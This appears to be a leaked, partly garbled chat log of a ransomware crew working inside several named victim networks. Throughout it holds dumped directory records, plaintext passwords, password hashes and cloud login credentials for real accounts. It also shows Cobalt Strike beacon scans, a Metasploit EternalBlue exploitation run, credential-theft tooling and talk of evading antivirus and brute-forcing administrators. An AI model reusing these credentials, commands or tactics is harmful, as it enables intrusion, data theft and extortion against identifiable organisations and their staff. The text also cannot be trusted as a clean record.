>userPrincipalName: Social@DressinGaudy.local
>mail: Social@gaudyme.com
>proxyAddresses: SMTP:Shopthegaudysite.orders@shopthegaudy.com
>proxyAddresses: smtp:Shopthegaudysite@dressingaudy.local
>userPrincipalName: Shopthegaudysite@DressinGaudy.local
>mail: Shopthegaudysite.orders@shopthegaudy.com
>proxyAddresses: smtp:order@dressingaudy.local
>proxyAddresses: SMTP:order@gaudyme.com
>userPrincipalName: order@DressinGaudy.local
>mail: order@gaudyme.com
>proxyAddresses: SMTP:admin@shopthegaudy.com
>proxyAddresses: smtp:admin@dressingaudy.local
>userPrincipalName: admin@DressinGaudy.local
>mail: admin@shopthegaudy.com
>proxyAddresses: SMTP:Careers@shopthegaudy.com
>proxyAddresses: smtp:Careers@dressingaudy.local
>userPrincipalName: Careers@DressinGaudy.local
>mail: Careers@shopthegaudy.com
>proxyAddresses: smtp:orders@gaudyme.com
>proxyAddresses: SMTP:orders@shopthegaudy.com
>proxyAddresses: smtp:orders@dressingaudy.local
>userPrincipalName: orders@DressinGaudy.local
>mail: orders@shopthegaudy.com
>proxyAddresses: smtp:DGLongview@dressingaudy.local
>proxyAddresses: SMTP:DGLongview@gaudyme.com
>userPrincipalName: DGLongview@DressinGaudy.local
>mail: DGLongview@gaudyme.com
>proxyAddresses: smtp:LeahP@dressingaudy.local
>proxyAddresses: SMTP:LeahP@gaudyme.com
>userPrincipalName: LeahP@DressinGaudy.local
>mail: LeahP@gaudyme.com
>proxyAddresses: smtp:madisonc@dressingaudy.local
>proxyAddresses: SMTP:madisonc@gaudyme.com
>userPrincipalName: madisonc@DressinGaudy.local
>mail: madisonc@gaudyme.com
>userPrincipalName: sabrinah@DressinGaudy.local
>mail: sabrinah@gaudyme.com
>proxyAddresses: smtp:scanning@dressingaudy.local
>proxyAddresses: SMTP:scanning@gaudyme.com
>userPrincipalName: scanning@DressinGaudy.local
>mail: scanning@gaudyme.com
>proxyAddresses: smtp:kaylab@dressingaudy.local
>proxyAddresses: SMTP:kaylab@gaudyme.com
>userPrincipalName: kaylab@DressinGaudy.local
>mail: kaylab@gaudyme.com
>proxyAddresses: smtp:gaudy@gaudyme.com
>proxyAddresses: SMTP:Gaudy@shopthegaudy.com
>proxyAddresses: smtp:gaudy@dressingaudy.local
>userPrincipalName: gaudy@DressinGaudy.local
>mail: Gaudy@shopthegaudy.com
>userPrincipalName: socialmedia2@DressinGaudy.local
>userPrincipalName: website@DressinGaudy.local
>userPrincipalName: socialmedia1@DressinGaudy.local
>proxyAddresses: smtp:VMPro@dressingaudy.local
>proxyAddresses: SMTP:VMPro@gaudyme.com
>userPrincipalName: VMPro@DressinGaudy.local
>mail: VMPro@gaudyme.com
>userPrincipalName: grantp@DressinGaudy.local
>userPrincipalName: Katelync@DressinGaudy.local
>userPrincipalName: Rockwall@DressinGaudy.local
>userPrincipalName: clittleton@DressinGaudy.local
>userPrincipalName: socialmedia3@DressinGaudy.local
>userPrincipalName: MackenziD@DressinGaudy.local
>userPrincipalName: cooperm@DressinGaudy.local
>userPrincipalName: magenl@DressinGaudy.local
>userPrincipalName: larkinp@DressinGaudy.local
>userPrincipalName: kimw@DressinGaudy.local
>userPrincipalName: teresac@DressinGaudy.local
>userPrincipalName: cindyh@DressinGaudy.local
>userPrincipalName: destineeg@DressinGaudy.local
>userPrincipalName: meganl@DressinGaudy.local
``Add users has no direct domain without a .local3 server and how should I know?) why laba then? because we never understood@tl2 is laba or not?
https://vmblog.ru/sbros-paroyal-root-v-vmware-esxi/
Is there a way to reset a password in the sphere? in the serviceenu the root password, maybe this account is used somewhere and how it can fall down? I think that if the network does not fall down, it may be worth just resetting passwords from the sphere on the icesxxes in crisp, not much so far looking for icesx cres, they only go there by cc, passwords are not stored(
also, it is possible that something started backing up in amazon backup, because there was an icon on the desktop of the admin
vobechel pochekal its email, he writes part of the servers restored and some could not, went to a link from the note)
And on some servers have put kaspersky anti-ransomeware tool what progress? not today, rebound@tl1 what about new sessions ?DecryptPwd seems to yank from the path, if not confused look it up
putty HKCU\Software\SimonTatham\PuTTY\Sessions
    	        recursive search for *.ppk up to 3rd level in
                %USERPROFILE%\Documents
                %USERPROFILE%\.ssh
                %USERPROFILE%\Downloads
              HKCU\Software\SimonTatham\PuTTY\Sessions
``but 2 minnu it doesn't retrieve passwords as far as i know there's a psh script on gita but it doesn't work is there anything to get passwords or sessions from putty? except goferokJR after 8 new sessions[ ](https://mediaeveryone.com/channel/general?msg=3BYaoa6CeJXwy8Aat) came up, thanks a lot but the builds are fresh on gita is there a latest version of mimic ?while deafshelcode[ ](https://mediaeveryone.com/channel/general?msg=B6SAQCaZw4TTtKhGQ) yes, come on she> there is an article how on esh from sphere reset the ruth password
not in the kurseda by the way, balimore are backBeremore have sessionsTL2 will be today? I wanted to ask him, maybe something washed up on the cessation of televisa?
there's an article on how to reset the root password from the sphere
it may be worth a try?
or the virtuals will fall down?
there are sessions while i monitor the admin
have to look for eshs what are you doing?
```
Force user logoff how long after time expires?: Never
Minimum password age (days): 1
Maximum password age (days): 90
Minimum password length: 7
Length of password history maintained: 12
Lockout threshold: 5
Lockout duration (minutes): 30
Lockout observation window (minutes): 30
Computer role: WORKSTATION
``LA
```
Administrator
UNIVERSE\Domain Admins
UNIVERSE\ITHelper-STC
UNIVERSE\SystemServiceAccounts
EA
```
Administrator brettb.admin brian.admin
harrison.admin josephy.admin jwahoff.admin
kuelker.admin2 MSOL_635e0c1d0736 shao.admin
sweeneyadmin2
``YES
```
adfssync administrator alanj.admin
austinh.admin brettb.admin brian.admin
chuck ericj.admin everestsrv
harrison.admin insightidr josephy.admin
jradmin jwahoff.admin keith.admin
kuelker.admin2 loggerx manning.admin
nexposescan prtglog shao.admin
spps2007 ssoadfs sweeneyadmin2
viveros.admin
``````
WILSONART\Administrator
{}wallC2013
``not everyone can see each other either,``
Wilsonart.com
srv: 141
arm: 2587
``the small ones see each other?
```
The trust relationship between the primary domain and the trusted domain failed.

``````
polyrey.net\Administrator
Password1
``See one large domain? Domains BEFORE 30 servers.
Number of Computers by AD:
 
Wilsonart.com
srv: 141
arm: 2587
 
uk.Wilsonart.com
srv: 25
arm: 157
 
eu.Wilsonart.com
srv: 43
arm: 10
 
uk.Wilsonart.com
srv: 1

WI.RWP.COM
srv: 60
arm: 515
 
TECHNISTONE.LOCAL
srv: 42
arm: 253
 
SLF.LOCAL
srv: 10
arm: 66
 
resopal.lan
srv: 27
arm: 100

ralpwilson.com
srv: 1
 
polyrey.net
srv: 64
arm: 340
 
BUSHBOARD.CO.UK
srv: 17
arm: 136
 
arborite.com
srv: 12
arm: 154
``give status on domains how many pc's and serverostalnym sees the head domain does not see the two domains we have a domain that sees everything? I don't know Tl2 says it can, so maybe if you can share drives they will see? I honestly have a hard time with the point that the software itself knows how to identify disks in europe left to find
We need to discuss what to do with such a large network
What to do with armas?
we want to ping that pings there is a scpreet that checks all drives and important processes
and from the servers the cipher will reach the armies
And then we ping the armies.
>dNSHostName: VIPW7700.resopal.lan
>description: virtuell auf VMware (Win 10)
172.22.198.250:22 (SSH-2.0-U_fcWc)
``````
gutemine
``sek@tl2@tl1mozhno etot pls
```
resopal\Administrator
8525195ec813eddb16f538c3a9b8f68e
``There is one, european yes with processes kipassatachka found? no password was there? I took out of the mail in memory? password is required? no) and you opened it? can we do something with kipass .kdbx? though no, bullshit aiipshniki like what from where and why?
```
kemp2
25228f174278a82e7202a25df2d9923b
1) in the america snaps they do not seem to store, back them up and delete them immediately there is access to snapshots nadov eu, if it is on the winndea is there any point in looking for the creed from the spherenay for whichspasnu I wrote 2 and 31 no2) Polyrey70
3) Louanne50[ ](https://mediaeveryone.com/group/wilsonart-com?msg=uzeoMWGyycXHP7cXz) @tl1`99Lustballons!
```
Chang
0aecf72f2e69f9e56672f4a9ffc9b653
``````
bod01-vce01.eu.wilsonart.com
 
bod01.svc.vcenter@eu.Wilsonart.com
Jupit3r=
``Second ``Netz_1020``[ ](https://mediaeveryone.com/group/wilsonart-com?msg=JsFqGZhSJQ7nrEcXc) .yes, what else do you need? ``The last one is who```Jupit3r=`eu.Wilsonart.com``
```
>sAMAccountName: bod01.svc.vcenter
 
010a5c70e9d2c4a433bb446137e24bcd
```
this one on kmd5 also passed ``eu.wilsonart.com
```
>sAMAccountName: Luka_Blerim
>description: AD Mitarbeiter Polyrey PW: Sommer2016
>memberOf: CN=Dir-Marketing_Update,OU=Security_Groups,OU=Groups,OU=Resopal,OU=_Germany,DC=eu,DC=Wilsonart,DC=com
>memberOf: CN=ADMigGrp,OU=Security_Groups_administrative,OU=Groups,OU=Resopal,OU=_Germany,DC=eu,DC=Wilsonart,DC=com
````eu.Wilsonart.com``
```
>sAMAccountName: BackupExec
>description: Administratoraccount fuer BackupExec
 
08e2fc16edd1c5d4b37ac32bc029877f
```
```
>sAMAccountName: BackupExecDedup
>description: Administratoraccount fuer den BackupExec Deduplizierungsordner
 
08e2fc16edd1c5d4b37ac32bc029877f
```
```
>sAMAccountName: svcveeam
>memberOf: CN=Backup Operators
 
0e7674530ce330128b4425c70fb97f92
````resopal.lan
```
>sAMAccountName: BackupExec
>description: Administratoraccount fuer BackupExec
>memberOf: CN=Backup Operators,CN=Builtin,DC=resopal,DC=lan
 
08e2fc16edd1c5d4b37ac32bc029877f
```
```
>sAMAccountName: Metzler
>description: Systemadministrator
>memberOf: CN=Backup Operators
 
30010b62fbd26d564f675f307be39e34
```
```
>sAMAccountName: BackupExecDedup
 
08e2fc16edd1c5d4b37ac32bc029877f
```
```
>sAMAccountName: Meyer
>description: Ausgeschieden am 31.07.BC0; --> shared Mailbox!
>memberOf: CN=Backup Operators
 
643a5b0efe1d2372327b2dbf5f2a4ffb
```
```
>sAMAccountName: Chang
>description: Systemadministrator
>memberOf: CN=Backup Operators
 
0aecf72f2e69f9e56672f4a9ffc9b653
```
The second and the last one on kmd5 passedMaybe the clears from 2 and 3
```
polyrey\Cavaille e0cf42dded1fbbb9a008834ecd2b8c27
polyrey\Grellety e86e6c5f19915009b3c65492416e1f62
polyrey\Blanchard 6e51b128879e247c4491c4ab182f2b9e
```
``CN=Admin_VCENTER`` - there is one dk and that's it, on going to the site here is this horror from 2003 in two domains, in ad comp only dk, no comps, no servers
there are subsnets - 445 gives out comps from the main domain
are these some planned / test domains? snapshots are made, exported to backup and deleted backups are stored on winserv)` Azerty02 `this one
02f1aac45c8eba915ba76df951e7ef04 Grelles2
``Azerty02 this one``
cc25135efc9f3a2b14fa789ced1728ce
### Eyes in a bunch ### I'm not @tl2, but I'll throw in #Chloe2019#@tl2, send me the hash ###
```
blanchp2 43711ca9520253e475fbd9a32b18317b
``Herbst2018sphere
```
fowlerh@wilsonart.com
R3f1nn3j2!
``````
admin pRe1Udlp!-symantec
``````
	 * Username : fowlerh@wilsonart.com
	 * Domain : outlook.office365.com
	 * Password : R3f1nn3j2!
``````
setg Proxies socks4:199.127.61.214:1488
``170.7.76.79esx
```
drpvw01.wilsonart.com
``another sphere
```
dcvcsa01.wilsonart.com
``````
>description: VMware vCenter 6.0 Server
>operatingSystem: Windows Server 2012 R2 Datacenter
>dNSHostName: dcwas79.Wilsonart.com

    Share name Type Used as Comment
    ----------------------------------------
    ADMIN$ Disk Remote Admin
    C$ Disk Default share
    D$ Disk Default share
    IPC$ IPC Remote IPC
 
>description: Veeam Backup Server
>operatingSystem: Windows Server 2016 Standard
>dNSHostName: dcveeam01.Wilsonart.com

    Share name Type Used as Comment
    ----------------------------------------
    ADMIN$ Disk Remote Admin
    C$ Disk Default share
    F$ Disk Default share
    IPC$ IPC Remote IPC
 
>description: Symantec End Point Management Server
>operatingSystem: Windows Server 2012 Standard
>dNSHostName: DCWAS45.Wilsonart.com

    Share name Type Used as Comment
    ------------------------------------------
    ADMIN$ Disk Remote Admin
    C$ Disk Default share
    IPC$ IPC Remote IPC
    print$ Disk Printer Drivers
 
>description: PROD Symantec AntiVirus Management Server
>operatingSystem: Windows Server 2012 Standard
>dNSHostName: FLWAS03.Wilsonart.com

    net view \FLWAS03.Wilsonart.com /all
    System error 53 has occurred.
    The network path was not found.

    Ping statistics for 170.7.20.198:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),

    170.7.20.198:53161
    170.7.20.198:49154
    170.7.20.198:49153
    170.7.20.198:9090
    170.7.20.198:8446
    170.7.20.198:8445
    170.7.20.198:8443
    170.7.20.198:8014
    170.7.20.198:8008
    170.7.20.198:8006
    170.7.20.198:5985
    170.7.20.198:5060
    170.7.20.198:3389
    170.7.20.198:2000
    170.7.20.198:1611
    170.7.20.198:1610
    170.7.20.198:1100
    170.7.20.198:143
    170.7.20.198:139
    170.7.20.198:135
    170.7.20.198:110
    170.7.20.198:80
    170.7.20.198:25
    170.7.20.198:21
 
 
 
 
 
>description: Vcenter Server
>dNSHostName: bod01-vce01.eu.wilsonart.com

    net view \bod01-vce01.eu.wilsonart.com /all
    System error 53 has occurred.
    The network path was not found.

    Ping statistics for 10.40.60.70:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),

    10.40.60.70:9443
    10.40.60.70:9087
    10.40.60.70:9084
    10.40.60.70:8084
    10.40.60.70:8008
    10.40.60.70:7444
    10.40.60.70:5580
    10.40.60.70:5480
    10.40.60.70:5060
    10.40.60.70:2020
    10.40.60.70:2015
    10.40.60.70:2014
    10.40.60.70:2012
    10.40.60.70:2000
    10.40.60.70:1514
    10.40.60.70:636
    10.40.60.70:514
    10.40.60.70:443
    10.40.60.70:389
    10.40.60.70:110
    10.40.60.70:88
    10.40.60.70:80
    10.40.60.70:25
    10.40.60.70:21
 
>description: Veeam Backup Server
>operatingSystem: Windows Server 2016 Standard
>dNSHostName: bod01-bkp01.eu.Wilsonart.com

    Share name Type Used as Comment
    ----------------------------------------------
    ADMIN$ Disk Remote Admin
    C$ Disk Default share
    D$ Disk Default share
    F$ Disk Default share
    IPC$ IPC Remote IPC
    R$ Disk Default share
    V$ Disk Default share
    veeam_agent_ISOs Disk
    W$ Disk Default share
    X$ Disk Default share
 
 
 
 
>dNSHostName: nas_signature.polyrey.net

    Share name Type Used as Comment
    ------------------------------------------------
    Archives_Outlook Disk
    Astier Disk
    CALDERA_RIPS Disk
    Depot Disk
    Design Library Disk
    INFO Disk
    IPC$ IPC IPC Service ()
    PROJETS_Signature Disk
    Signature_PAO Disk
    TEST_JFC Disk
    Users_Archives Disk Users_Archives

    172.25.168.64:6281
    172.25.168.64:5001
    172.25.168.64:5000
    172.25.168.64:548
    172.25.168.64:443
    172.25.168.64:139
    172.25.168.64:80
    172.25.168.64:445 (platform: 500 version: 6.1 name: NAS_SIGNATURE domain: POLYREY)
 
 
 
 
 
 
>description: virtuell auf VMware (Win 10)
>operatingSystem: Windows 10 Pro
>dNSHostName: VIPW7700.resopal.lan

    net view \VIPW7700.resopal.lan /all
    Systemfehler 53 aufgetreten.
    Der Netzwerkpfad wurde nicht gefunden.

    Antwort von 172.22.198.250: Zielhost nicht erreichbar.
    Ping-Statistik für 172.22.190.190:
    Pakete: Gesendet = 4, Empfangen = 4, Verloren = 0
    (0% Verlust),

    172.22.198.250:541
    172.22.198.250:443
    172.22.198.250:22 (SSH-2.0-U_fcWc)
 
 
 
 
>operatingSystem: Windows 7 Professional
>dNSHostName: BBBACKUP.bushboard.co.uk

    Ping request could not find host BBBACKUP.bushboard.co.uk. Please check the name and try again.
 
>description: Backup Server
>operatingSystem: Windows Server 2012 Datacenter
>servicePrincipalName: MSSQLSvc/BBBK01.bushboard.co.uk:VEEAMSQL2012
>dNSHostName: BBBK01.bushboard.co.uk

    Ping statistics for 2002:c001:147::c001:147:
    Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
 
>operatingSystem: Windows Server 2012 Datacenter
>servicePrincipalName: MSSQLSvc/testmove.bushboard.co.uk:VEEAMSQL2012
>dNSHostName: testmove.bushboard.co.uk

    Ping statistics for 2002:c001:15c::c001:15c:
    Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
 
>operatingSystem: Windows Server 2016 Standard
>servicePrincipalName: MSSQLSvc/BBDC03.bushboard.co.uk:VEEAMSQL2012
>servicePrincipalName: MSSQLSvc/BBDC03.bushboard.co.uk:VEEAMSQL2016
>dNSHostName: BBDC03.bushboard.co.uk

    Share name Type Used as Comment
    -------------------------------------------------------------------------------
    ADMIN$ Disk Remote Admin
    Bushboard Backups Disk
    C$ Disk Default share
    E$ Disk Default share
    F$ Disk Default share
    IPC$ IPC Remote IPC
    iTop-2.6.1-4463 Disk
    log Disk
    SQL_Server Disk
    U$ Disk Default share
    UpdateServicesPackages Disk A network share to be used by client systems for collecting all software packages (usually applications) published on this WSUS system.  
    VBRCatalog Disk
    vCenterBackups Disk
    WsusContent Disk A network share to be used by Local Publishing to place published content on this WSUS system.                                           
    WSUSTemp Disk A network share used by Local Publishing from a Remote WSUS Console Instance.                        
 
>operatingSystem: unknown
>dNSHostName: ltn01-vcenter01.bushboard.co.uk

    Ping statistics for 2002:c001:111::c001:111:
    Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),
 
 
 
 
>operatingSystem: Windows 10 Pro
>dNSHostName: NB-AsemBackup.technistone.local
>User: adm-cavailj - IP Address: 172.25.168.113
`User: petersm2 - IP Address: 170.7.76.192````
adm-cavailj adm-GrelleS Administrator
alexanm bmccm fowlerh
lucase moorer2 owensd
petersm2 polyreyadmin roeders
solarwindsarm.svc vyombmccm
``````
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
sysadmin
ZOHOCORP\raja-9298
The command completed successfully.



The request will be processed at a domain controller for domain csez.zohocorpin.com.

Group name Enterprise Admins
Comment Designated administrators of the enterprise

Members

-------------------------------------------------------------------------------
Administrator pmpdemo rmp
The command completed successfully.



The request will be processed at a domain controller for domain csez.zohocorpin.com.

Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator adssp assetprober
desktopcentral gjprabu-0985 kamal-0150
nocfw sysadmin sysaudit
vijay-3486 zohoits
The command completed successfully.
``open as xls``
Resource Name User Account Password
anand1 acc1 test1_%#@
anand1 aa aa z$ZMGxCAewr8Z
Gun as p7<umNNq

``@user3
```
beacon> portscan 192.168.16.0/24 23,22,80,1433,135,445,3389,5900
[*] Tasked beacon to scan ports 23,22,80,1433,135,445,3389,5900 on 192.168.16.0/24
[+] host called home, sent: 74813 bytes
[+] received output:
Scanner module is complete

beacon> portscan 192.168.16.0/24
[*] Tasked beacon to scan ports 1-1024,3389,5900-6000 on 192.168.16.0/24
[+] host called home, sent: 74813 bytes
[+] received output:
Scanner module is complete
``exactly))`` double space bar try to remove the double space bar really started, although I'm sure it gave an error.... but ok
`execute-assembly /home/user/Desktop/TOOLS/1/Rubeus.exe monitor /interval:1` - does not want to work and gives help. is there anything you can do about it? hmm. now it weighs230 kilobytes it is heavier than 1M for fileless execution and why do you drop it?i need to run rubus and AV kills it as soon as i drop it in my mind yes, what's wrong with dll? @tl2 do we have a way to pack the exe file so it won't get killed by AV? `Win 7 Pro
```
svembu.localzoho.com [172.20.3.7]
zcpl-wine6420.localzoho.com [172.20.3.7]
rex-0179.localzoho.com [172.20.3.7]
oorni-3055.localzoho.com [172.20.3.7]
vijaya-dr1.localzoho.com [172.20.3.7]
srini-1728.localzoho.com [172.20.3.7]
zforms-w7-64-1.localzoho.com [172.20.3.7]
abrar--4885.localzoho.com [172.20.3.7]
mohammed-con127.localzoho.com [172.20.3.7]
mohan-2271-temp.localzoho.com [172.20.3.7]
integ-wiin7.localzoho.com [172.20.3.7]
sivanandam-2729.localzoho.com [172.20.3.7]
integ-win7-1-bc.localzoho.com [172.20.3.7]

integ-win7-1.csez.zohocorpin.com [192.168.113.57]
integ-win7-2.csez.zohocorpin.com [192.168.113.71]

tmrm-compliance.csez.zohocorpin.com [192.168.225.179]
``would need to specify domain sbmuser sbmdomain sbmpassprice... it's strange that it's vulnerable...but here you probably need a credentials...

[*] 192.168.113.242:445 - Target OS: Windows 10 Pro 10586
[-] 192.168.113.113.242:445 - Unable to find accessible named pipe!
[*] 192.168.113.113:242:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

``would ms17_010_command not use@tl2 any ideas?
```
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] 192.168.113.242:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.113.242:445 - Host is probably VULNERABLE to MS17-010! - Windows 10 Pro 10586 x64 (64-bit)
[*] 192.168.113.113:242:445 - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.113.242:445 - Connecting to target for exploitation.
[+] 192.168.113.113:242:445 - Connection established for exploitation.
[+] 192.168.113.113:242:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.113.113:242:445 - CORE raw buffer dump (20 bytes)
[*] 192.168.113.113.242:445 - 0x00000000 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 31 Windows 10 Pro 1
[*] 192.168.113.242:445 - 0x00000010 30 35 38 36 0586
[+] 192.168.113.242:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.113.113.242:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.113.113.242:445 - Sending all but last fragment of exploit packet
[-] 192.168.113.242:445 - RubySMB::Error::CommunicationError: Read timeout expired when reading from the Socket (timeout=30)
[*] Started bind TCP handler against 192.168.113.242:4444
[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/ms17_010_eternalblue) >

````Win Serv 2008 R2`

```
win2k8adc.localzoho.com [172.20.3.7]
vcenter.localzoho.com [172.20.3.7]
print-server-bk.localzoho.com [172.20.3.7]
hpacc-control.localzoho.com [172.20.3.7]

printserver.csez.zohocorpin.com [192.168.100.206]
est-it-storage.csez.zohocorpin.com [192.168.100.74]
est-av-server.csez.zohocorpin.com [192.168.100.68]

finance-server.csez.zohocorpin.com [192.168.112.132]

integ-i18n.csez.zohocorpin.com [192.168.113.56]

tally-server.csez.zohocorpin.com [192.168.206.51]
``Well, there's one already.
then on 17-010 to scan vin2008 servers is still quite possible and the second one
```
beacon> shell ping INTEG-DRBD-XP64
[*] Tasked beacon to run: ping INTEG-DRBD-XP64
[+] host called home, sent: 51 bytes
[+] received output:

Pinging integ-drbd-xp64.csez.zohocorpin.com [192.168.113.49] with 32 bytes of data:
Request timed out.
Request timed out.
Request timed out.
Request timed out.

Ping statistics for 192.168.113.49:
    Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),

``One.
```
beacon> shell ping INTEG-XP1
[*] Tasked beacon to run: ping INTEG-XP1
[+] host called home, sent: 45 bytes
[+] received output:

Pinging integ-xp1.csez.zohocorpin.com [192.168.113.58] with 32 bytes of data:
Reply from 192.168.113.58: bytes=32 time=8ms TTL=62
Reply from 192.168.113.58: bytes=32 time=8ms TTL=62
Reply from 192.168.113.58: bytes=32 time=8ms TTL=62
Reply from 192.168.113.58: bytes=32 time=8ms TTL=62

Ping statistics for 192.168.113.58:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 8ms, Maximum = 8ms, Average = 8ms

``There's still no XP exploit working so why don't you try 17-010 ? XP Professional is and 2012 R2 is 2008 R2-AD has no 2003 / XP cars ? Just nothing else comes to mind but it's hardly a good idea ... big network, brute-force here....
maybe try a list of domain admins@tl1 Maybe brute-force the top passwords?
Minimum password length: 8
Length of password history maintained: 3
Lockout threshold: 15
Lockout duration (minutes): 15
``Describe progress to the workgroupswiden signed by @user8`LP-BC8DTT2 what was the pk name? or polzakwosupply.comdesire2learn.com user:jguerrero
bigassfans.com user:lmmoore which ones are dead? can i get into wsndomain.com? both networks are dead the rest are dead no i have 1 how many networks with YES? how many or how many of each? yes, mine is back
working with it check the input cobu i got 30 silencershop.com in the same groups the rest of you who are working write down the progress who wrote down the dead sessions in groups, wait 20 minutes write in groups that need to be reopened created[ ](https://mediaeveryone.com/channel/general?msg=BTTw8up58goy7kT7E) go to the site - d2l.com[ ](https://mediaeveryone.com/channel/general?msg=TNJMxWoAgagW66y9j) yes
URL : https://wosupply.okta.com/
Username : bert.engeron@wosupply.com
Password : Summer2019
```
i think this is the real domaindesire2learn.com I just downloaded it, what is the real domain of the group?
@tl1ad_user_desireln.d2lvv taken+1 free see? I can't see it, I've already created a confu
>userPrincipalName: *davidw@dvdempire.lan
>objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=dvdempire,DC=lan
>dSCorePropagationData: 16010101000000.0Z
>lastLogonTimestamp: 132467236873201585
>textEncodedORAddress: X400:C=us;A= ;P=DVD Empire;O=Exchange;S=Walter;G=David;I=M;
*>mail: davidw@dvdempire.com
````dvdempire.lan ``dvdempire.com````
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@sugarinstant.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@tlagay.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@popporn.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@digiflixxx.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@adultempiredistributing.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@pornstarempire.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@ravanallc.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@empirestore.net
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@dekkoo.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@adultempirefilms.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@empirestores.co
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@adultempirecash.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@whackoffer.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@useddvdempire.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@blackholeboards.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@bedroomadvisor.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@bargainadultdvd.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@strangespin.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@bluedoor.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@rentals.goodvibes.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@vivid.dvdempire.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@spicetvstore.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@arraydisplays.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@it.dvdempire.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@empirebase.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@sixflavors.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@uencode.net
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@uencode.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@total2257.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@2257.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@bluecastvod.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@adultempire.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@redgalaxy.com
>proxyAddresses: SMTP:GFIME_MOVEEXCH_USER@adultdvdempire.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@dvdempire.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@gaydvdempire.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@useddvd.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@stripclubdatabase.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@pornstardata.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@dvdempire.lan
>proxyAddress
What is the real one? At the end of the fucking dvdempire.lanmbh mobile user and works through wifiColleagues, I'm writing a note to the general channel!
In the process of mstsc.exe I have not worked shell with the following error:
```
[-] Could not connect to pipe: 2
```
The right solution to this error was Inject to another process, namely rundll32.exe
Now I use the command line without knowing what to do! ðrnvpna\Not finding PO mzt+ there is one more available@user7 your back `BEngeron@192.168.0.19 (LP-BC8DTT2)`ifconf did not show anything, now check cf@user1 your back Checking for signs of vpn? who died could come back Check input codeNo connection On the second `LDAP_BIND: [] Error 0x51 (81) - Server Down
Terminating program.
`Nothing comes up net domain and AD find doesn't strat why? Mm-hmm>mail: KMartin@snpartners.com
>proxyAddresses: SMTP:KMartin@snpartners.comАД not removed probably snpartners.com what are the names of the fields? look - there are lots of emails on domains in users
https://www.snpartners.com/
https://www.martinsullivan.com/
https://www.snpartners.com/
they all have something to do with john deereOne FMP.local2 came@user3 take it away there +1 session new where did you download the ad users? I downloaded there above - there names as autogenerated take the ad users and watch it then sure not av lab121 mb file on ad users - even in the terminal all do not fit into the terminal what about ad?
172.31.190.10:445 (platform: 500 version: 10.0 name: JDODC64 domain: JDOSSN)
172.31.190.11:445 (platform: 500 version: 10.0 name: JDODC64 domain: JDOSSN)

[+] received output:
172.31.190.12:445 (platform: 500 version: 10.0 name: JDODC65 domain: JDOSSN)
172.31.190.16:445 (platform: 500 version: 6.3 name: JDOFIEECONN01 domain: JDOSSN)
172.31.190.17:445 (platform: 500 version: 10.0 name: JDODHCP02 domain: JDOSSN)

[+] received output:
172.31.190.47:445 (platform: 500 version: 10.0 name: JDODC67 domain: JDOSSN)
172.31.190.62:445 (platform: 500 version: 6.3 name: JDOCHOPS12 domain: JDOSSN)
172.31.190.66:445 (platform: 500 version: 6.3 name: JDOCHSVC12 domain: JDOSSN)
172.31.190.100:445 (platform: 500 version: 5.0 name: NDHSNASC9102 domain: JDOSSN)
